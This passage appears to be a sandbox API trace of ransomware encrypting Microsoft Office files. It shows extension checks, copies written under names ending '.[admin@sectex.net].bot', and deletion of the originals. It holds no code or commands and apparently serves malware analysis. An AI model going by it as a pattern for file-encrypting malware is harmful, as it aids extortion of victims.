	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.911] lstrlenW (lpString=".doc") returned 4
	[0143.911] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0143.911] lstrlenW (lpString=".docx") returned 5
	[0143.911] lstrcmpiW (lpString1=".docx", lpString2="R.ICO") returned -1
	[0143.911] lstrlenW (lpString=".pdf") returned 4
	[0143.911] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0143.911] lstrlenW (lpString=".xls") returned 4
	[0143.911] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0143.911] lstrlenW (lpString=".xlsx") returned 5
	[0143.911] lstrcmpiW (lpString1=".xlsx", lpString2="R.ICO") returned -1
	[0143.911] lstrlenW (lpString=".ppt") returned 4
	[0143.911] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.911] lstrlenW (lpString=".zip") returned 4
	[0143.911] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0143.911] lstrlenW (lpString=".rar") returned 4
	[0143.911] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0143.911] lstrlenW (lpString=".bz2") returned 4
	[0143.911] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0143.911] lstrlenW (lpString=".7z") returned 3
	[0143.911] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.911] lstrlenW (lpString=".dbf") returned 4
	[0143.911] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.911] lstrlenW (lpString=".1cd") returned 4
	[0143.911] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.912] lstrlenW (lpString=".jpg") returned 4
	[0143.912] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0143.912] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0143.912] lstrlenW (lpString="DBWIZ.VSL") returned 9
	[0143.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.946] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=164216) returned 1
	[0143.946] CloseHandle (hObject=0x2a0) returned 1
	[0143.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl")) returned 0x20
	[0143.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.947] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.947] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.947] GetLastError () returned 0x0
	[0143.947] ReadFile (in: hFile=0x2a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x28178, lpOverlapped=0x0) returned 1
	[0144.000] WriteFile (in: hFile=0x3c4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x28180, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x28180, lpOverlapped=0x0) returned 1
	[0144.005] ReadFile (in: hFile=0x2a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.005] WriteFile (in: hFile=0x3c4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0144.005] SetEndOfFile (hFile=0x3c4) returned 1
	[0144.005] CloseHandle (hObject=0x3c4) returned 1
	[0144.005] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.005] SetEndOfFile (hFile=0x2a0) returned 1
	[0144.010] CloseHandle (hObject=0x2a0) returned 1
	[0144.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.010] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl")) returned 1
	[0144.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.010] lstrlenW (lpString=".doc") returned 4
	[0144.011] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString=".docx") returned 5
	[0144.011] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1
	[0144.011] lstrlenW (lpString=".pdf") returned 4
	[0144.011] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString=".xls") returned 4
	[0144.011] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.011] lstrlenW (lpString=".xlsx") returned 5
	[0144.011] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1
	[0144.011] lstrlenW (lpString=".ppt") returned 4
	[0144.011] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.011] lstrlenW (lpString=".zip") returned 4
	[0144.011] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.011] lstrlenW (lpString=".rar") returned 4
	[0144.011] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString=".bz2") returned 4
	[0144.011] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString=".7z") returned 3
	[0144.011] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.011] lstrlenW (lpString=".dbf") returned 4
	[0144.011] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.011] lstrlenW (lpString=".1cd") returned 4
	[0144.011] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.011] lstrlenW (lpString=".jpg") returned 4
	[0144.011] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.012] lstrlenW (lpString=".doc") returned 4
	[0144.012] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString=".docx") returned 5
	[0144.012] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1
	[0144.012] lstrlenW (lpString=".pdf") returned 4
	[0144.012] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString=".xls") returned 4
	[0144.012] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.012] lstrlenW (lpString=".xlsx") returned 5
	[0144.012] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1
	[0144.012] lstrlenW (lpString=".ppt") returned 4
	[0144.012] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.012] lstrlenW (lpString=".zip") returned 4
	[0144.012] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.012] lstrlenW (lpString=".rar") returned 4
	[0144.012] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString=".bz2") returned 4
	[0144.012] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString=".7z") returned 3
	[0144.012] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.012] lstrlenW (lpString=".dbf") returned 4
	[0144.012] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.012] lstrlenW (lpString=".1cd") returned 4
	[0144.012] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57
	[0144.012] lstrlenW (lpString=".jpg") returned 4
	[0144.012] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.013] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0144.013] lstrlenW (lpString="DL_RES.DLL") returned 10
	[0144.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0144.050] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=10632) returned 1
	[0144.058] CloseHandle (hObject=0x398) returned 1
	[0144.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll")) returned 0x20
	[0144.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.072] lstrlenW (lpString=".doc") returned 4
	[0144.072] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.072] lstrlenW (lpString=".docx") returned 5
	[0144.072] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.072] lstrlenW (lpString=".pdf") returned 4
	[0144.072] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.072] lstrlenW (lpString=".xls") returned 4
	[0144.072] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.072] lstrlenW (lpString=".xlsx") returned 5
	[0144.072] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.072] lstrlenW (lpString=".ppt") returned 4
	[0144.072] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.072] lstrlenW (lpString=".zip") returned 4
	[0144.072] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.072] lstrlenW (lpString=".rar") returned 4
	[0144.072] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.072] lstrlenW (lpString=".bz2") returned 4
	[0144.072] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.072] lstrlenW (lpString=".7z") returned 3
	[0144.072] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.072] lstrlenW (lpString=".dbf") returned 4
	[0144.072] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.072] lstrlenW (lpString=".1cd") returned 4
	[0144.072] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.072] lstrlenW (lpString=".jpg") returned 4
	[0144.072] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.073] lstrlenW (lpString=".doc") returned 4
	[0144.073] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString=".docx") returned 5
	[0144.073] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.073] lstrlenW (lpString=".pdf") returned 4
	[0144.073] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString=".xls") returned 4
	[0144.073] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString=".xlsx") returned 5
	[0144.073] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.073] lstrlenW (lpString=".ppt") returned 4
	[0144.073] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.073] lstrlenW (lpString=".zip") returned 4
	[0144.073] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString=".rar") returned 4
	[0144.073] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.073] lstrlenW (lpString=".bz2") returned 4
	[0144.073] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.073] lstrlenW (lpString=".7z") returned 3
	[0144.073] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.073] lstrlenW (lpString=".dbf") returned 4
	[0144.073] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.073] lstrlenW (lpString=".1cd") returned 4
	[0144.074] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58
	[0144.074] lstrlenW (lpString=".jpg") returned 4
	[0144.074] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.074] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0144.074] lstrlenW (lpString="DWGDPRES.DLL") returned 12
	[0144.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.697] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=16224) returned 1
	[0144.697] CloseHandle (hObject=0x384) returned 1
	[0144.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll")) returned 0x20
	[0144.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.968] lstrlenW (lpString=".doc") returned 4
	[0144.969] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString=".docx") returned 5
	[0144.969] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.969] lstrlenW (lpString=".pdf") returned 4
	[0144.969] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString=".xls") returned 4
	[0144.969] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString=".xlsx") returned 5
	[0144.969] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.969] lstrlenW (lpString=".ppt") returned 4
	[0144.969] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.969] lstrlenW (lpString=".zip") returned 4
	[0144.969] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString=".rar") returned 4
	[0144.969] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString=".bz2") returned 4
	[0144.969] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.969] lstrlenW (lpString=".7z") returned 3
	[0144.969] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.969] lstrlenW (lpString=".dbf") returned 4
	[0144.969] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.969] lstrlenW (lpString=".1cd") returned 4
	[0144.969] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.969] lstrlenW (lpString=".jpg") returned 4
	[0144.969] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.969] lstrlenW (lpString=".doc") returned 4
	[0144.970] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.970] lstrlenW (lpString=".docx") returned 5
	[0144.970] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.970] lstrlenW (lpString=".pdf") returned 4
	[0144.970] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.970] lstrlenW (lpString=".xls") returned 4
	[0144.970] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.970] lstrlenW (lpString=".xlsx") returned 5
	[0144.970] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.970] lstrlenW (lpString=".ppt") returned 4
	[0144.970] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.970] lstrlenW (lpString=".zip") returned 4
	[0144.970] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.970] lstrlenW (lpString=".rar") returned 4
	[0144.970] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.970] lstrlenW (lpString=".bz2") returned 4
	[0144.970] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.970] lstrlenW (lpString=".7z") returned 3
	[0144.970] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.970] lstrlenW (lpString=".dbf") returned 4
	[0144.970] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.970] lstrlenW (lpString=".1cd") returned 4
	[0144.970] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60
	[0144.970] lstrlenW (lpString=".jpg") returned 4
	[0144.970] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.970] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0144.971] lstrlenW (lpString="GANTT.VSL") returned 9
	[0144.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0144.972] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=320880) returned 1
	[0144.972] CloseHandle (hObject=0x3a4) returned 1
	[0144.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl")) returned 0x20
	[0144.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0144.974] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.974] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.975] GetLastError () returned 0x0
	[0144.975] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x4e570, lpOverlapped=0x0) returned 1
	[0145.004] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x4e580, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x4e580, lpOverlapped=0x0) returned 1
	[0145.010] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.010] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0145.010] SetEndOfFile (hFile=0x384) returned 1
	[0145.010] CloseHandle (hObject=0x384) returned 1
	[0145.011] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.011] SetEndOfFile (hFile=0x3b0) returned 1
	[0145.018] CloseHandle (hObject=0x3b0) returned 1
	[0145.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
